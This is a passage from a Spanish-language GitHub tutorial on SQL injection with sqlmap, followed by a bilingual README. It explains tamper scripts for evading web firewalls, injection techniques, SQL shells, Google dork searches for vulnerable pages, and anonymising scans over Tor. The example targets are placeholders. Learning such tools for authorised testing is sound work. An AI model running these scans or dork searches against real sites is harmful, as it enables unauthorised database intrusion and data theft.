vez que hemos visto el uso básico para la utilización de esta herramienta vamos al siguiente paso, en el ejemplo anterior usamos como muestra una página inventada en donde todo funcionó desde la primera, pero siendo realistas no siempre pasa eso, siempre nos vamos a encontrar con sitios web mas "complicados" y es desde este punto en donde esto se hace mas interesante. vamos a ver el uso de TAMPERS 285 | 286 | Otras opciones importantes que vamos a ver son: 287 | 288 | ``` 289 | | --random-agent | Lo cual nos permite "cambiar" el user agent con el cual se ejecutan las consultas | 290 | 291 | | --proxy=proxy | Lo cual nos permite conectarnos a la página que queremos escanear por medio de un proxy | 292 | 293 | | --level=1-5 | Este nos permite modificar el nivel de con el que queremos hacer el escaneo, por defecto esta en el en nivel 1 pero podemos cambiarlo hasta el 5 para hacer mas intrisivo el escaneo | 294 | 295 | | --risk=1-3 | De igual manera que --level, risk nos permite cambiar el nivel con el que queremos hacer el escaneo agregando mas agresividad pero al mismo tiempo haciendo mas ruido, este se puede configurar desde el 1 al 3 vieniendo por defecto en el número 1 | 296 | 297 | ``` 298 | 299 | ## TAMPERS 300 | 301 | ### Qué es un Tamper 302 | 303 | Un tamper es un archivo en python que nos da la opcion de "camuflar" los payloads que usa la herramienta de sqlmap para asi poder "bypassear" algun WAF. 304 | 305 | Sqlmap cuenta con una gran variedad de Tampers para ayudar a que la inyección sql se cumpla, cada Tamper tiene su funcion y su compativilidad, en algunos casos estos pueden mezclarse para un mejor resultado. 306 | 307 | Podemos ver la lista completa de los tampers dentro de la repo de sqlmap 308 | 309 | `https://github.com/sqlmapproject/sqlmap/tree/master/tamper` 310 | 311 | ### Funcion de un Tamper 312 | 313 | Cada tamper tiene su propia funcionalidad, en este caso vamos a ver solo unos ejemplos para ver como estan diseñados los tampers y ver su funcionamiento. 314 | 315 | como ejemplo vamos a analizar el tamper: randomcomments 316 | 317 | `https://github.com/sqlmapproject/sqlmap/blob/master/tamper/randomcomments.py` 318 | 319 | podemos ver su funcion en una parte de su codigo: 320 | 321 | ``` 322 | import re 323 | 324 | from lib.core.common import randomRange 325 | from lib.core.compat import xrange 326 | from lib.core.data import kb 327 | from lib.core.enums import PRIORITY 328 | 329 | __priority__ = PRIORITY.LOW 330 | 331 | def tamper(payload, **kwargs): 332 | """ 333 | Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT) 334 | >>> import random 335 | >>> random.seed(0) 336 | >>> tamper('INSERT') 337 | 'I/**/NS/**/ERT' 338 | """ 339 | ``` 340 | Basicamente lo que hace es añadir comentarios en las palabras usadas en el payload, ejemplo: 341 | 342 | ``` 343 | SELECT -> S/**/E/**/LECT 344 | 345 | UNION -> UN/**/I/**/ON 346 | ``` 347 | 348 | ### ¿Cómo usar los tampers? 349 | 350 | Para hacer uso de un tamper o varios tampers en el escaneo de un sitio web tenemos que especificarlo con la siguiente opcion: 351 | 352 | `--tamper="nombredeltamper"` 353 | 354 | si queremos usar mas de un tamper solo tenemos que usar una , para separarlos: 355 | 356 | `--tamper="nombredeltamper1,nombredeltamper2,nombredeltamper3,etc"` 357 | 358 | Entonces, tenemos la siguente linea con los tampers agregados: 359 | 360 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --tamper="nombredeltamper1,nombredeltamper2,nombredeltamper3,etc"` 361 | 362 | 363 | ### Tampers mas usados 364 | 365 | Para poder clasificar los tampers mas usados primero debemos separar los tampers para organizarlos, como mencioné antes, cada tamper es diferente y cada uno se usa para cosas distintas, por eso vamos a separar los tampers por bases de datos en donde funcionan: 366 | 367 | Tenemos lo siguiente: 368 | 369 | #### MySQL 370 | 371 | ``` 372 | space2randomblank 373 | unionalltounion 374 | unmagicquotes 375 | versionedkeywords 376 | versionedmorekeywords 377 | xforwardedforbetween 378 | bluecoat 379 | charencode 380 | charunicodeencode 381 | concat2concatws 382 | equaltolike 383 | greatest 384 | halfversionedmorekeywords 385 | ifnull2ifisnull 386 | space2morehash 387 | space2mysqldash 388 | space2plus 389 | modsecurityversioned 390 | modsecurityzeroversioned 391 | multiplespaces 392 | securesphere 393 | space2comment 394 | space2hash 395 | nonrecursivereplacement 396 | percentage 397 | randomcase 398 | 399 | ``` 400 | 401 | #### MSSQL 402 | 403 | ``` 404 | sp_password 405 | space2comment 406 | space2dash 407 | space2mssqlblank 408 | space2mysqldash 409 | space2plus 410 | space2randomblank 411 | charencode 412 | charunicodeencode 413 | equaltolike 414 | greatest 415 | unionalltounion 416 | unmagicquotes 417 | multiplespaces 418 | nonrecursivereplacement 419 | percentage 420 | randomcase 421 | securesphere 422 | 423 | ``` 424 | 425 | #### MSAccess 426 | 427 | ``` 428 | modsecurityversioned 429 | modsecurityzeroversioned 430 | equaltolike 431 | greatest 432 | halfversionedmorekeywords 433 | nonrecursivereplacement 434 | percentage 435 | randomcase 436 | securesphere 437 | between 438 | bluecoat 439 | charencode 440 | charunicodeencode 441 | concat2concatws 442 | space2comment 443 | space2hash 444 | space2morehash 445 | space2mysqldash 446 | space2plus 447 | space2randomblank 448 | unionalltounion 449 | unmagicquotes 450 | versionedkeywords 451 | versionedmorekeywords 452 | ifnull2ifisnull 453 | multiplespaces 454 | 455 | ``` 456 | 457 | #### PostgreSQL 458 | 459 | ``` 460 | xforwardedfor 461 | space2comment 462 | space2plus 463 | space2randomblank 464 | between 465 | charencode 466 | charunicodeencode 467 | equaltolike 468 | greatest 469 | multiplespaces 470 | nonrecursivereplacement 471 | percentage 472 | randomcase 473 | securesphere 474 | between 475 | 476 | ``` 477 | 478 | #### SQLite 479 | 480 | ``` 481 | space2plus 482 | unionalltounion 483 | unmagicquotes 484 | xforwardedfor 485 | ifnull2ifisnull 486 | randomcase 487 | securesphere 488 | space2comment 489 | space2dashmmultiplespaces 490 | nonrecursivereplacement 491 | 492 | ``` 493 | ### Techniques 494 | 495 | Otro punto importante es conocer las tecnicas que utiliza esta herramienta. 496 | 497 | Como sabemos, sqlmap utiliza muchos tipos de payloads los cuales se clasifican en 6 partes, los cuales son: 498 | 499 | ``` 500 | B: Boolean-based blind 501 | E: Error-based 502 | U: Union query-based 503 | S: Stacked queries 504 | T: Time-based blind 505 | Q: Inline queries 506 | 507 | ``` 508 | #### Boolean-based blind 509 | 510 | Boolean-based blind significa que la vulnerabilidad se basa en valores booleanos (true or false) y se dice que es ciega por que no muetra alguna señal de que hay un error en la página. 511 | 512 | #### Error-based 513 | 514 | Error-based significa que la inyeccion se basa en los mensajes de error que el servidor responde y asi conocer un poco mas sobre la estructura de la base de datos que se esta usando. 515 | 516 | #### Union query-based 517 | 518 | Union query-based significa que estamos aprovechando que el operador UNION de sql puede ser usado, gracias a esto podemos combinar declaraciones que serán visualizadas como parte de la respuesta del servidor. 519 | 520 | #### Stacked queries 521 | 522 | Stacked queries significa que la vulneravilidad se basa en añadir mas consultas sql en serie, de esta manera mandar una consulta normal y al mismo tiempo mandar la consulta del atacante, todo esto solo dividiendo las consultas con un ";". 523 | 524 | #### Time-based blind 525 | 526 | Time-based blind es cuando la vulnerabilidad se basa en el tiempo, lo que significa que un atacante enviará una consulta sql obligano a la base de datos a esperar una cierta cantidad de tiempo, si el tiempo de respuesta del servidor es el mismo tiempo que el atacante declaró en la sentencia, esto significa que es vulnerable. 527 | 528 | #### Inline queries 529 | 530 | Inline queries consiste en unir una query sql dentro de otra y asi sucesivamente para ver si la sentencia es ejecutada. 531 | 532 | Ahora que ya sabemos cuales con las tecnicas y a que tipo de error de enfoca cada una, vamos a ver como utilizarlas. 533 | 534 | 535 | Para utilizar alguna tecnica deltro del escaneo tenemos que declarar la siguente opcion: 536 | 537 | ` 538 | --technique=TECH SQL injection techniques to use (default "BEUSTQ") 539 | ` 540 | Sqlmap por defecto utiliza todas las tecnicas al mismo tiempo lo que viene siendo igual que: 541 | 542 | ` 543 | --technique=BEUSTQ 544 | ` 545 | 546 | Esto es muy bueno, ya que la herramienta nos facilita mucho el trabajo pero al mismo tiempo esto hace que el escaneo tarde mas ya que escanea para todos los errores para detectarlo. Antes de hacer un escaneo tenemos que tratar de recolectar toda la informacion posible para que se nos haga mas sencillo el escaneo y ahorras mas tiempo, como por ejemplo detectar que error estamos viendo y asi declarar que tipo de error queremos explotar usando una tecnica para ese tipo de error en especifico, gracias a esto le decimos a la herramienta que se enfoque solamente en ese tipo de error y hacer mas rapido y directo el escaneo. 547 | 548 | por ejemplo: 549 | 550 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --technique=B` 551 | 552 | 553 | ### Risk y Level 554 | 555 | Otra cosa muy importante es conocer el "Risk" y Level": 556 | 557 | Risk: riesgo de que se produzca un error. Los payloads que menos riesgo tienen son las de riesgo 1, y las que más las de riesgo 2. 558 | 559 | Level: cantidad de peticiones por payload. El nivel 1 realiza pocas peticiones mientras que el nivel 5 realiza muchas. 560 | 561 | ### SQL-shell 562 | 563 | la opción `--sql-shell` nos carga una shell de SQL desde la cual podemos trabajar 564 | 565 | Ejemplo: 566 | 567 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --sql-shell` 568 | 569 | ### SQL-query 570 | 571 | la opción `--sql-query` 572 | 573 | #### Sqlmap y dorks 574 | 575 | Sqlmap tambien nos permite hacer una busqueda por dorks de google para encontrar paginas vulnerables, esto se hace con la siguente secuencia: 576 | 577 | 578 | `sqlmap.py -g DORK` 579 | 580 | ejemplo: 581 | 582 | `sqlmap.py -g "inurl:\".php?id=1\""` 583 | 584 | 585 | ### Escaneos anonimos con Tor 586 | 587 | Una de las partes mas importantes al hacer un trabajo en el área de la seguridad informatica es saber cuidarse un poco, para es el anonimato es esencial, en este caso vamos a usar TOR para filtrar las peticiones. 588 | 589 | `sqlmap.py --tor --tor-type=SOCKS5 --check-tor -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1"` 590 | 591 | 592 | Para terminar me gustaría agradecerte por dedicarle un poco de tu tiempo a este escrito, si te gusta puedes compartirlo. 593 | 594 | 595 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # INYECCIÓN SQL USANDO SQLMAP 💉 2 | 3 | ## ¿Para quién esta enfocado este escrito? 4 | 5 | ➡️ Para las personas que quieran aprendar a usar la herramienta sqlmap 6 | 7 | ➡️ Este escrito esta enfocado para todas las personas que quieran aprender acerca de las inyecciones sql 8 | 9 | ➡️ No es necesarío que tengas conociemiento del tema 10 | 11 | ⚠️ Este escrito es la continuación de 2 escritos acerca de inyecciónes sql manuales, personalmente recomiendo que se aprenda el metodo manual primero. ⚠️ 12 | 13 | 👇 Dejo los links aqui abajo: 👇 14 | 15 | 16 | ### Inyecciones sql basico 17 | 18 | https://github.com/Y000o/sql_injection_basic 19 | 20 | ### Inyecciones sql medio - avanzado 21 | 22 | https://github.com/Y000o/Sql_injection_medium-advanced.md 23 | ----------------------------------------------------------------------------------------------------------------------- 24 | 25 | Puedes disfrutar de este escrito en los siguientes idiomas: 26 | 27 | ## Texto en Español: 28 | 29 | https://github.com/Y000o/sql_injection_basic/blob/master/sql_injection_basic.md 30 | 31 | ## Text in English: 32 | 33 | https://github.com/Y000o/sql_injection_basic/blob/master/sql_injection_basic_en.md 34 | 35 | ### Si te gusta el contenido me ayudarías mucho compartiendo 36 | 37 | ----------------------------------------------------------------------------------------------------------------------- 38 | 39 | 40 | # SQL INJECTION USING SQLMAP 💉 41 | 42 | ## Who is this writing focused on? 43 | 44 | ➡️ For people who want to learn how to use the sqlmap tool 45 | 46 | ➡️ This writing is focused for all the people who want to learn about sql injections 47 | 48 | ➡️ It is not necessary that you have knowledge of the subject 49 | 50 | ⚠️ This post is the continuation of 2 posts about manual sql injection, I personally recommend that you learn the manual method first. ⚠️ 51 | 52 | 👇 I leave the links here below: 👇 53 | 54 | 55 | ### Basic sql injections 56 | 57 | https://github.com/Y000o/sql_injection_basic 58 | 59 | ### Medium sql injections - advanced 60 | 61 | https://github.com/Y000o/Sql_injection_medium-advanced.md 62 | -------------------------------------------------- -------------------------------------------------- ------------------- 63 | 64 | You can enjoy this writing in the following languages: 65 | 66 | ## Text in Spanish: 67 | 68 | https://github.com/Y000o/sql_injection_basic/blob/master/sql_injection_basic.md 69 | 70 | ## Text in English: 71 | 72 | https://github.com/Y000o/sql_injection_basic/blob/master/sql_injection_basic_en.md 73 | 74 | ### If you like the content you would help me a lot by sharing 75 | 76 | -------------------------------------------------- -------------------------------------------------- ------------------- 77 | --------------------------------------------------------------------------------